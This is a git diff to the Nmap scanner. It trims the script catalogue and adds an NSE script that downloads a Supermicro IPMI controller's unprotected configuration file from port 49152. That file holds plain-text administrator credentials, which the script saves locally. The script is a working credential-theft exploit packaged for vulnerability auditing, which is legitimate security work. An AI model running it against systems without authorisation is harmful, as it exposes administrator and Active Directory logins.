diff --git a/scripts/script.db b/scripts/script.db
index 713f14535..27e7999b7 100644
--- a/scripts/script.db
+++ b/scripts/script.db
@@ -236,248 +236,3 @@ Entry { filename = "http-vuln-cve2014-2129.nse", categories = { "safe", "vuln",
 Entry { filename = "http-vuln-wnr1000-creds.nse", categories = { "exploit", "intrusive", "vuln", } }
 Entry { filename = "http-waf-detect.nse", categories = { "discovery", "intrusive", } }
 Entry { filename = "http-waf-fingerprint.nse", categories = { "discovery", "intrusive", } }
-Entry { filename = "http-wordpress-brute.nse", categories = { "brute", "intrusive", } }
-Entry { filename = "http-wordpress-enum.nse", categories = { "auth", "intrusive", "vuln", } }
-Entry { filename = "http-wordpress-plugins.nse", categories = { "discovery", "intrusive", } }
-Entry { filename = "http-xssed.nse", categories = { "discovery", "external", "safe", } }
-Entry { filename = "iax2-brute.nse", categories = { "brute", "intrusive", } }
-Entry { filename = "iax2-version.nse", categories = { "version", } }
-Entry { filename = "icap-info.nse", categories = { "discovery", "safe", } }
-Entry { filename = "ike-version.nse", categories = { "default", "discovery", "safe", "version", } }
-Entry { filename = "imap-brute.nse", categories = { "brute", "intrusive", } }
-Entry { filename = "imap-capabilities.nse", categories = { "default", "safe", } }
-Entry { filename = "informix-brute.nse", categories = { "brute", "intrusive", } }
-Entry { filename = "informix-query.nse", categories = { "auth", "intrusive", } }
-Entry { filename = "informix-tables.nse", categories = { "auth", "intrusive", } }
-Entry { filename = "ip-forwarding.nse", categories = { "discovery", "safe", } }
-Entry { filename = "ip-geolocation-geobytes.nse", categories = { "discovery", "external", "safe", } }
-Entry { filename = "ip-geolocation-geoplugin.nse", categories = { "discovery", "external", "safe", } }
-Entry { filename = "ip-geolocation-ipinfodb.nse", categories = { "discovery", "external", "safe", } }
-Entry { filename = "ip-geolocation-maxmind.nse", categories = { "discovery", "external", "safe", } }
-Entry { filename = "ipidseq.nse", categories = { "discovery", "safe", } }
-Entry { filename = "ipv6-node-info.nse", categories = { "default", "discovery", "safe", } }
-Entry { filename = "ipv6-ra-flood.nse", categories = { "dos", "intrusive", } }
-Entry { filename = "irc-botnet-channels.nse", categories = { "discovery", "safe", "vuln", } }
-Entry { filename = "irc-brute.nse", categories = { "brute", "intrusive", } }
-Entry { filename = "irc-info.nse", categories = { "default", "discovery", "safe", } }
-Entry { filename = "irc-sasl-brute.nse", categories = { "brute", "intrusive", } }
-Entry { filename = "irc-unrealircd-backdoor.nse", categories = { "exploit", "intrusive", "malware", "vuln", } }
-Entry { filename = "iscsi-brute.nse", categories = { "brute", "intrusive", } }
-Entry { filename = "iscsi-info.nse", categories = { "default", "discovery", "safe", } }
-Entry { filename = "isns-info.nse", categories = { "discovery", "safe", } }
-Entry { filename = "jdwp-exec.nse", categories = { "exploit", "intrusive", } }
-Entry { filename = "jdwp-info.nse", categories = { "default", "discovery", "safe", } }
-Entry { filename = "jdwp-inject.nse", categories = { "exploit", "intrusive", } }
-Entry { filename = "jdwp-version.nse", categories = { "version", } }
-Entry { filename = "krb5-enum-users.nse", categories = { "auth", "intrusive", } }
-Entry { filename = "ldap-brute.nse", categories = { "brute", "intrusive", } }
-Entry { filename = "ldap-novell-getpass.nse", categories = { "discovery", "safe", } }
-Entry { filename = "ldap-rootdse.nse", categories = { "discovery", "safe", } }
-Entry { filename = "ldap-search.nse", categories = { "discovery", "safe", } }
-Entry { filename = "lexmark-config.nse", categories = { "discovery", "safe", } }
-Entry { filename = "llmnr-resolve.nse", categories = { "broadcast", "discovery", "safe", } }
-Entry { filename = "lltd-discovery.nse", categories = { "broadcast", "discovery", "safe", } }
-Entry { filename = "maxdb-info.nse", categories = { "default", "version", } }
-Entry { filename = "mcafee-epo-agent.nse", categories = { "safe", "version", } }
-Entry { filename = "membase-brute.nse", categories = { "brute", "intrusive", } }
-Entry { filename = "membase-http-info.nse", categories = { "discovery", "safe", } }
-Entry { filename = "memcached-info.nse", categories = { "discovery", "safe", } }
-Entry { filename = "metasploit-info.nse", categories = { "intrusive", "safe", } }
-Entry { filename = "metasploit-msgrpc-brute.nse", categories = { "brute", "intrusive", } }
-Entry { filename = "metasploit-xmlrpc-brute.nse", categories = { "brute", "intrusive", } }
-Entry { filename = "mikrotik-routeros-brute.nse", categories = { "brute", "intrusive", } }
-Entry { filename = "mmouse-brute.nse", categories = { "brute", "intrusive", } }
-Entry { filename = "mmouse-exec.nse", categories = { "intrusive", } }
-Entry { filename = "modbus-discover.nse", categories = { "discovery", "intrusive", } }
-Entry { filename = "mongodb-brute.nse", categories = { "brute", "intrusive", } }
-Entry { filename = "mongodb-databases.nse", categories = { "default", "discovery", "safe", } }
-Entry { filename = "mongodb-info.nse", categories = { "default", "discovery", "safe", } }
-Entry { filename = "mrinfo.nse", categories = { "broadcast", "discovery", "safe", } }
-Entry { filename = "ms-sql-brute.nse", categories = { "brute", "intrusive", } }
-Entry { filename = "ms-sql-config.nse", categories = { "discovery", "safe", } }
-Entry { filename = "ms-sql-dac.nse", categories = { "discovery", "safe", } }
-Entry { filename = "ms-sql-dump-hashes.nse", categories = { "auth", "discovery", "safe", } }
-Entry { filename = "ms-sql-empty-password.nse", categories = { "auth", "intrusive", } }
-Entry { filename = "ms-sql-hasdbaccess.nse", categories = { "auth", "discovery", "safe", } }
-Entry { filename = "ms-sql-info.nse", categories = { "default", "discovery", "safe", } }
-Entry { filename = "ms-sql-query.nse", categories = { "discovery", "safe", } }
-Entry { filename = "ms-sql-tables.nse", categories = { "discovery", "safe", } }
-Entry { filename = "ms-sql-xp-cmdshell.nse", categories = { "intrusive", } }
-Entry { filename = "msrpc-enum.nse", categories = { "discovery", "safe", } }
-Entry { filename = "mtrace.nse", categories = { "broadcast", "discovery", "safe", } }
-Entry { filename = "murmur-version.nse", categories = { "version", } }
-Entry { filename = "mysql-audit.nse", categories = { "discovery", "safe", } }
-Entry { filename = "mysql-brute.nse", categories = { "brute", "intrusive", } }
-Entry { filename = "mysql-databases.nse", categories = { "discovery", "intrusive", } }
-Entry { filename = "mysql-dump-hashes.nse", categories = { "auth", "discovery", "safe", } }
-Entry { filename = "mysql-empty-password.nse", categories = { "auth", "intrusive", } }
-Entry { filename = "mysql-enum.nse", categories = { "brute", "intrusive", } }
-Entry { filename = "mysql-info.nse", categories = { "default", "discovery", "safe", } }
-Entry { filename = "mysql-query.nse", categories = { "auth", "discovery", "safe", } }
-Entry { filename = "mysql-users.nse", categories = { "auth", "intrusive", } }
-Entry { filename = "mysql-variables.nse", categories = { "discovery", "intrusive", } }
-Entry { filename = "mysql-vuln-cve2012-2122.nse", categories = { "discovery", "intrusive", "vuln", } }
-Entry { filename = "nat-pmp-info.nse", categories = { "default", "discovery", "safe", } }
-Entry { filename = "nat-pmp-mapport.nse", categories = { "discovery", "safe", } }
-Entry { filename = "nbstat.nse", categories = { "default", "discovery", "safe", } }
-Entry { filename = "ncp-enum-users.nse", categories = { "auth", "safe", } }
-Entry { filename = "ncp-serverinfo.nse", categories = { "default", "discovery", "safe", } }
-Entry { filename = "ndmp-fs-info.nse", categories = { "discovery", "safe", } }
-Entry { filename = "ndmp-version.nse", categories = { "version", } }
-Entry { filename = "nessus-brute.nse", categories = { "brute", "intrusive", } }
-Entry { filename = "nessus-xmlrpc-brute.nse", categories = { "brute", "intrusive", } }
-Entry { filename = "netbus-auth-bypass.nse", categories = { "auth", "safe", "vuln", } }
-Entry { filename = "netbus-brute.nse", categories = { "brute", "intrusive", } }
-Entry { filename = "netbus-info.nse", categories = { "default", "discovery", "safe", } }
-Entry { filename = "netbus-version.nse", categories = { "version", } }
-Entry { filename = "nexpose-brute.nse", categories = { "brute", "intrusive", } }
-Entry { filename = "nfs-ls.nse", categories = { "discovery", "safe", } }
-Entry { filename = "nfs-showmount.nse", categories = { "discovery", "safe", } }
-Entry { filename = "nfs-statfs.nse", categories = { "discovery", "safe", } }
-Entry { filename = "nping-brute.nse", categories = { "brute", "intrusive", } }
-Entry { filename = "nrpe-enum.nse", categories = { "discovery", "intrusive", } }
-Entry { filename = "ntp-info.nse", categories = { "default", "discovery", "safe", } }
-Entry { filename = "ntp-monlist.nse", categories = { "discovery", "intrusive", } }
-Entry { filename = "omp2-brute.nse", categories = { "brute", "intrusive", } }
-Entry { filename = "omp2-enum-targets.nse", categories = { "discovery", "safe", } }
-Entry { filename = "openlookup-info.nse", categories = { "default", "discovery", "safe", "version", } }
-Entry { filename = "openvas-otp-brute.nse", categories = { "brute", "intrusive", } }
-Entry { filename = "oracle-brute-stealth.nse", categories = { "brute", "intrusive", } }
-Entry { filename = "oracle-brute.nse", categories = { "brute", "intrusive", } }
-Entry { filename = "oracle-enum-users.nse", categories = { "auth", "intrusive", } }
-Entry { filename = "oracle-sid-brute.nse", categories = { "brute", "intrusive", } }
-Entry { filename = "ovs-agent-version.nse", categories = { "version", } }
-Entry { filename = "p2p-conficker.nse", categories = { "default", "safe", } }
-Entry { filename = "path-mtu.nse", categories = { "discovery", "safe", } }
-Entry { filename = "pcanywhere-brute.nse", categories = { "brute", "intrusive", } }
-Entry { filename = "pgsql-brute.nse", categories = { "brute", "intrusive", } }
-Entry { filename = "pjl-ready-message.nse", categories = { "intrusive", } }
-Entry { filename = "pop3-brute.nse", categories = { "brute", "intrusive", } }
-Entry { filename = "pop3-capabilities.nse", categories = { "default", "discovery", "safe", } }
-Entry { filename = "pptp-version.nse", categories = { "version", } }
-Entry { filename = "qconn-exec.nse", categories = { "exploit", "intrusive", "vuln", } }
-Entry { filename = "qscan.nse", categories = { "discovery", "safe", } }
-Entry { filename = "quake1-info.nse", categories = { "default", "discovery", "safe", "version", } }
-Entry { filename = "quake3-info.nse", categories = { "default", "discovery", "safe", "version", } }
-Entry { filename = "quake3-master-getservers.nse", categories = { "default", "discovery", "safe", } }
-Entry { filename = "rdp-enum-encryption.nse", categories = { "discovery", "safe", } }
-Entry { filename = "rdp-vuln-ms12-020.nse", categories = { "intrusive", "vuln", } }
-Entry { filename = "realvnc-auth-bypass.nse", categories = { "auth", "default", "safe", } }
-Entry { filename = "redis-brute.nse", categories = { "brute", "intrusive", } }
-Entry { filename = "redis-info.nse", categories = { "discovery", "safe", } }
-Entry { filename = "resolveall.nse", categories = { "discovery", "safe", } }
-Entry { filename = "reverse-index.nse", categories = { "safe", } }
-Entry { filename = "rexec-brute.nse", categories = { "brute", "intrusive", } }
-Entry { filename = "rfc868-time.nse", categories = { "discovery", "safe", "version", } }
-Entry { filename = "riak-http-info.nse", categories = { "discovery", "safe", } }
-Entry { filename = "rlogin-brute.nse", categories = { "brute", "intrusive", } }
-Entry { filename = "rmi-dumpregistry.nse", categories = { "default", "discovery", "safe", } }
-Entry { filename = "rmi-vuln-classloader.nse", categories = { "intrusive", "vuln", } }
-Entry { filename = "rpc-grind.nse", categories = { "version", } }
-Entry { filename = "rpcap-brute.nse", categories = { "brute", "intrusive", } }
-Entry { filename = "rpcap-info.nse", categories = { "discovery", "safe", } }
-Entry { filename = "rpcinfo.nse", categories = { "default", "discovery", "safe", } }
-Entry { filename = "rsync-brute.nse", categories = { "brute", "intrusive", } }
-Entry { filename = "rsync-list-modules.nse", categories = { "discovery", "safe", } }
-Entry { filename = "rtsp-methods.nse", categories = { "default", "safe", } }
-Entry { filename = "rtsp-url-brute.nse", categories = { "brute", "intrusive", } }
-Entry { filename = "s7-info.nse", categories = { "discovery", "intrusive", } }
-Entry { filename = "samba-vuln-cve-2012-1182.nse", categories = { "intrusive", "vuln", } }
-Entry { filename = "servicetags.nse", categories = { "default", "discovery", "safe", } }
-Entry { filename = "sip-brute.nse", categories = { "brute", "intrusive", } }
-Entry { filename = "sip-call-spoof.nse", categories = { "discovery", "intrusive", } }
-Entry { filename = "sip-enum-users.nse", categories = { "auth", "intrusive", } }
-Entry { filename = "sip-methods.nse", categories = { "default", "discovery", "safe", } }
-Entry { filename = "skypev2-version.nse", categories = { "version", } }
-Entry { filename = "smb-brute.nse", categories = { "brute", "intrusive", } }
-Entry { filename = "smb-check-vulns.nse", categories = { "dos", "exploit", "intrusive", "vuln", } }
-Entry { filename = "smb-enum-domains.nse", categories = { "discovery", "intrusive", } }
-Entry { filename = "smb-enum-groups.nse", categories = { "discovery", "intrusive", } }
-Entry { filename = "smb-enum-processes.nse", categories = { "discovery", "intrusive", } }
-Entry { filename = "smb-enum-sessions.nse", categories = { "discovery", "intrusive", } }
-Entry { filename = "smb-enum-shares.nse", categories = { "discovery", "intrusive", } }
-Entry { filename = "smb-enum-users.nse", categories = { "auth", "intrusive", } }
-Entry { filename = "smb-flood.nse", categories = { "dos", "intrusive", } }
-Entry { filename = "smb-ls.nse", categories = { "discovery", "safe", } }
-Entry { filename = "smb-mbenum.nse", categories = { "discovery", "safe", } }
-Entry { filename = "smb-os-discovery.nse", categories = { "default", "discovery", "safe", } }
-Entry { filename = "smb-print-text.nse", categories = { "intrusive", } }
-Entry { filename = "smb-psexec.nse", categories = { "intrusive", } }
-Entry { filename = "smb-security-mode.nse", categories = { "default", "discovery", "safe", } }
-Entry { filename = "smb-server-stats.nse", categories = { "discovery", "intrusive", } }
-Entry { filename = "smb-system-info.nse", categories = { "discovery", "intrusive", } }
-Entry { filename = "smb-vuln-ms10-054.nse", categories = { "dos", "intrusive", "vuln", } }
-Entry { filename = "smb-vuln-ms10-061.nse", categories = { "intrusive", "vuln", } }
-Entry { filename = "smbv2-enabled.nse", categories = { "default", "safe", } }
-Entry { filename = "smtp-brute.nse", categories = { "brute", "intrusive", } }
-Entry { filename = "smtp-commands.nse", categories = { "default", "discovery", "safe", } }
-Entry { filename = "smtp-enum-users.nse", categories = { "auth", "external", "intrusive", } }
-Entry { filename = "smtp-open-relay.nse", categories = { "discovery", "external", "intrusive", } }
-Entry { filename = "smtp-strangeport.nse", categories = { "malware", "safe", } }
-Entry { filename = "smtp-vuln-cve2010-4344.nse", categories = { "exploit", "intrusive", "vuln", } }
-Entry { filename = "smtp-vuln-cve2011-1720.nse", categories = { "intrusive", "vuln", } }
-Entry { filename = "smtp-vuln-cve2011-1764.nse", categories = { "intrusive", "vuln", } }
-Entry { filename = "sniffer-detect.nse", categories = { "discovery", "intrusive", } }
-Entry { filename = "snmp-brute.nse", categories = { "brute", "intrusive", } }
-Entry { filename = "snmp-hh3c-logins.nse", categories = { "default", "discovery", "safe", } }
-Entry { filename = "snmp-interfaces.nse", categories = { "default", "discovery", "safe", } }
-Entry { filename = "snmp-ios-config.nse", categories = { "intrusive", } }
-Entry { filename = "snmp-netstat.nse", categories = { "default", "discovery", "safe", } }
-Entry { filename = "snmp-processes.nse", categories = { "default", "discovery", "safe", } }
-Entry { filename = "snmp-sysdescr.nse", categories = { "default", "discovery", "safe", } }
-Entry { filename = "snmp-win32-services.nse", categories = { "default", "discovery", "safe", } }
-Entry { filename = "snmp-win32-shares.nse", categories = { "default", "discovery", "safe", } }
-Entry { filename = "snmp-win32-software.nse", categories = { "default", "discovery", "safe", } }
-Entry { filename = "snmp-win32-users.nse", categories = { "auth", "default", "safe", } }
-Entry { filename = "socks-auth-info.nse", categories = { "default", "discovery", "safe", } }
-Entry { filename = "socks-brute.nse", categories = { "brute", "intrusive", } }
-Entry { filename = "socks-open-proxy.nse", categories = { "default", "discovery", "external", "safe", } }
-Entry { filename = "ssh-hostkey.nse", categories = { "default", "discovery", "safe", } }
-Entry { filename = "ssh2-enum-algos.nse", categories = { "discovery", "safe", } }
-Entry { filename = "sshv1.nse", categories = { "default", "safe", } }
-Entry { filename = "ssl-ccs-injection.nse", categories = { "safe", "vuln", } }
-Entry { filename = "ssl-cert.nse", categories = { "default", "discovery", "safe", } }
-Entry { filename = "ssl-date.nse", categories = { "default", "discovery", "safe", } }
-Entry { filename = "ssl-enum-ciphers.nse", categories = { "discovery", "intrusive", } }
-Entry { filename = "ssl-google-cert-catalog.nse", categories = { "discovery", "external", "safe", } }
-Entry { filename = "ssl-heartbleed.nse", categories = { "safe", "vuln", } }
-Entry { filename = "ssl-known-key.nse", categories = { "default", "discovery", "safe", "vuln", } }
-Entry { filename = "sslv2.nse", categories = { "default", "safe", } }
-Entry { filename = "sstp-discover.nse", categories = { "default", "discovery", } }
-Entry { filename = "stun-info.nse", categories = { "discovery", "safe", } }
-Entry { filename = "stun-version.nse", categories = { "version", } }
-Entry { filename = "stuxnet-detect.nse", categories = { "discovery", "intrusive", } }
-Entry { filename = "svn-brute.nse", categories = { "brute", "intrusive", } }
-Entry { filename = "targets-asn.nse", categories = { "discovery", "external", "safe", } }
-Entry { filename = "targets-ipv6-multicast-echo.nse", categories = { "broadcast", "discovery", } }
-Entry { filename = "targets-ipv6-multicast-invalid-dst.nse", categories = { "broadcast", "discovery", } }
-Entry { filename = "targets-ipv6-multicast-mld.nse", categories = { "broadcast", "discovery", } }
-Entry { filename = "targets-ipv6-multicast-slaac.nse", categories = { "broadcast", "discovery", } }
-Entry { filename = "targets-sniffer.nse", categories = { "broadcast", "discovery", "safe", } }
-Entry { filename = "targets-traceroute.nse", categories = { "discovery", "safe", } }
-Entry { filename = "teamspeak2-version.nse", categories = { "version", } }
-Entry { filename = "telnet-brute.nse", categories = { "brute", "intrusive", } }
-Entry { filename = "telnet-encryption.nse", categories = { "discovery", "safe", } }
-Entry { filename = "tftp-enum.nse", categories = { "discovery", "intrusive", } }
-Entry { filename = "tls-nextprotoneg.nse", categories = { "default", "discovery", "safe", } }
-Entry { filename = "traceroute-geolocation.nse", categories = { "discovery", "external", "safe", } }
-Entry { filename = "unittest.nse", categories = { "safe", } }
-Entry { filename = "unusual-port.nse", categories = { "safe", } }
-Entry { filename = "upnp-info.nse", categories = { "default", "discovery", "safe", } }
-Entry { filename = "url-snarf.nse", categories = { "safe", } }
-Entry { filename = "ventrilo-info.nse", categories = { "default", "discovery", "safe", "version", } }
-Entry { filename = "versant-info.nse", categories = { "discovery", "safe", } }
-Entry { filename = "vmauthd-brute.nse", categories = { "brute", "intrusive", } }
-Entry { filename = "vnc-brute.nse", categories = { "brute", "intrusive", } }
-Entry { filename = "vnc-info.nse", categories = { "default", "discovery", "safe", } }
-Entry { filename = "voldemort-info.nse", categories = { "discovery", "safe", } }
-Entry { filename = "vuze-dht-info.nse", categories = { "discovery", "safe", } }
-Entry { filename = "wdb-version.nse", categories = { "default", "discovery", "version", "vuln", } }
-Entry { filename = "weblogic-t3-info.nse", categories = { "default", "discovery", "safe", "version", } }
-Entry { filename = "whois-domain.nse", categories = { "discovery", "external", "safe", } }
-Entry { filename = "whois-ip.nse", categories = { "discovery", "external", "safe", } }
-Entry { filename = "wsdd-discover.nse", categories = { "default", "discovery", "safe", } }
-Entry { filename = "x11-access.nse", categories = { "auth", "default", "safe", } }
-Entry { filename = "xdmcp-discover.nse", categories = { "discovery", "safe", } }
-Entry { filename = "xmpp-brute.nse", categories = { "brute", "intrusive", } }
-Entry { filename = "xmpp-info.nse", categories = { "default", "discovery", "safe", "version", } }
diff --git a/scripts/supermicro-ipmi-conf.nse b/scripts/supermicro-ipmi-conf.nse
new file mode 100644
index 000000000..fdda0264c
--- /dev/null
+++ b/scripts/supermicro-ipmi-conf.nse
@@ -0,0 +1,95 @@
+description = [[
+Attempts to download an unprotected configuration file containing plain-text user credentials in vulnerable Supermicro Onboard IPMI controllers.
+
+The script connects to port 49152 and issues a request for "/PSBlock" to download the file. This configuration file contains users with their passwords in plain text.
+
+References:
+* http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras/
+* https://community.rapid7.com/community/metasploit/blog/2013/07/02/a-penetration-testers-guide-to-ipmi
+]]
+
+---
+-- @usage nmap -p49152 --script supermicro-ipmi-conf <target>
+-- 
+-- @output
+-- PORT      STATE SERVICE REASON
+-- 49152/tcp open  unknown syn-ack
+-- | supermicro-ipmi-conf: 
+-- |   VULNERABLE:
+-- |   Supermicro IPMI/BMC configuration file disclosure
+-- |     State: VULNERABLE (Exploitable)
+-- |     Description:
+-- |       Some Supermicro IPMI/BMC controllers allow attackers to download
+-- |        a configuration file containing plain text user credentials. This credentials may be used to log in to the administrative interface and the 
+-- |       network's Active Directory.
+-- |     Disclosure date: 2014-06-19
+-- |     Extra information:
+-- |       Snippet from configuration file:
+-- |   .............31spring.............\x14..............\x01\x01\x01.\x01......\x01ADMIN...........ThIsIsApAsSwOrD.............T.T............\x01\x01\x01.\x01......\x01ipmi............w00t!.............\x14.............
+-- |   Configuration file saved to 'xxx.xxx.xxx.xxx_bmc.conf'
+-- |   
+-- |     References:
+-- |_      http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras/
+--
+-- @args supermicro-ipmi-conf.out Output file to store configuration file. Default: <ip>_bmc.conf
+---
+
+author = "Paulino Calderon <calderon () websec mx>"
+license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
+categories = {"exploit","vuln"}
+
+local http = require "http"
+local nmap = require "nmap"
+local shortport = require "shortport"
+local string = require "string"
+local vulns = require "vulns"
+local stdnse = require "stdnse"
+
+portrule = shortport.portnumber(49152, "tcp")
+
+---
+--Writes string to file
+local function write_file(filename, contents)
+  local f, err = io.open(filename, "w")
+  if not f then
+    return f, err
+  end
+  f:write(contents)
+  f:close()
+  return true
+end
+
+action = function(host, port)
+  local fw = stdnse.get_script_args(SCRIPT_NAME..".out") or host.ip.."_bmc.conf"
+  local vuln = {
+       title = 'Supermicro IPMI/BMC configuration file disclosure',
+       state = vulns.STATE.NOT_VULN, 
+       description = [[
+Some Supermicro IPMI/BMC controllers allow attackers to download
+ a configuration file containing plain text user credentials. This credentials may be used to log in to the administrative interface and the 
+network's Active Directory.]],
+       references = {
+           'http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras/',
+       },
+       dates = {
+           disclosure = {year = '2014', month = '06', day = '19'},
+       },
+     }
+     
+  local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
+  local open_session = http.get(host.ip, port, "/PSBlock")
+  if open_session and open_session.status ==200 and string.len(open_session.body)>200 then
+    s = open_session.body:gsub("%z", ".")
+    vuln.state = vulns.STATE.EXPLOIT
+    vuln.extra_info = "Snippet from configuration file:\n"..string.sub(s, 25, 200)
+    local status, err = write_file(fw,s)
+    if status then
+      extra_info = string.format("\nConfiguration file saved to '%s'\n", fw)
+    else
+      stdnse.debug(1, "Error saving configuration file to '%s': %s\n", fw, err)
+    end	
+
+    vuln.extra_info = "Snippet from configuration file:\n"..string.sub(s, 25, 200)..extra_info
+  end
+  return vuln_report:make_output(vuln)
+end